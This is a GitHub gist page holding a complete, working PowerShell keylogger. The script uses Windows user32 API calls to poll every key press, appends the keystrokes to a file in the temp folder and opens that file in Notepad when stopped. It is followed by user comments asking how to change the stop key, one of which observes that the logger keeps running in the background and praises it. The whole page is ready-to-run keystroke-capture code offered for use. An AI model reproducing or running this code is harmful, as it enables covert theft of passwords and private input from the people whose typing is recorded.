/gist:7ca1c059dd3b3fbc7277
Created Dec 11, 2015
| #requires -Version 2 | |
| function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
| { | |
| # Signatures for API Calls | |
| $signatures = @' | |
| [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
| public static extern short GetAsyncKeyState(int virtualKeyCode); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int GetKeyboardState(byte[] keystate); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int MapVirtualKey(uint uCode, int uMapType); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); | |
| '@ | |
| # load signatures and make members available | |
| $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru | |
| # create output file | |
| $null = New-Item -Path $Path -ItemType File -Force | |
| try | |
| { | |
| Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red | |
| # create endless loop. When user presses CTRL+C, finally-block | |
| # executes and shows the collected key presses | |
| while ($true) { | |
| Start-Sleep -Milliseconds 40 | |
| # scan all ASCII codes above 8 | |
| for ($ascii = 9; $ascii -le 254; $ascii++) { | |
| # get current key state | |
| $state = $API::GetAsyncKeyState($ascii) | |
| # is key pressed? | |
| if ($state -eq -32767) { | |
| $null = [console]::CapsLock | |
| # translate scan code to real code | |
| $virtualKey = $API::MapVirtualKey($ascii, 3) | |
| # get keyboard state for virtual keys | |
| $kbstate = New-Object Byte[] 256 | |
| $checkkbstate = $API::GetKeyboardState($kbstate) | |
| # prepare a StringBuilder to receive input key | |
| $mychar = New-Object -TypeName System.Text.StringBuilder | |
| # translate virtual key | |
| $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) | |
| if ($success) | |
| { | |
| # add key to logger file | |
| [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) | |
| } | |
| } | |
| } | |
| } | |
| } | |
| finally | |
| { | |
| # open logger file in Notepad | |
| notepad $Path | |
| } | |
| } | |
| # records all key presses until script is aborted by pressing CTRL+C | |
| # will then open the file with collected key codes | |
| Start-KeyLogger |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Sheetal315
commented
Feb 24, 2017
|
What if I don't want to stop through 'Ctrl+C' and use some other way to stop ? |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
TRSO4
May 2, 2018
Yeah.. How do you change it from "Ctrl+C" to something else
...I Have somewhat of a solution to this ctrl-c thingy. (I would love to know how to change the stop command to ctrl+xyz)
You only have to press ctrl-c once to show the file, after that the logger will keep running! It keeps saving the keys that are typed in the appdata temp. folder. There you can access the file (Called keylogger duh!) . Keep in mind that the logger WILL NOT STOP! (unless you cancel the process inside of tsk manager).
Love the keylogger BTW... good job
TRSO4
commented
May 2, 2018
•
edited
Edited 1 time
-
TRSO4
edited May 2, 2018
edited
-
May 2, 2018
|
Yeah.. How do you change it from "Ctrl+C" to something else ...I Have somewhat of a solution to this ctrl-c thingy. (I would love to know how to change the stop command to ctrl+xyz) Love the keylogger BTW... good job |
What if I don't want to stop through 'Ctrl+C' and use some other way to stop ?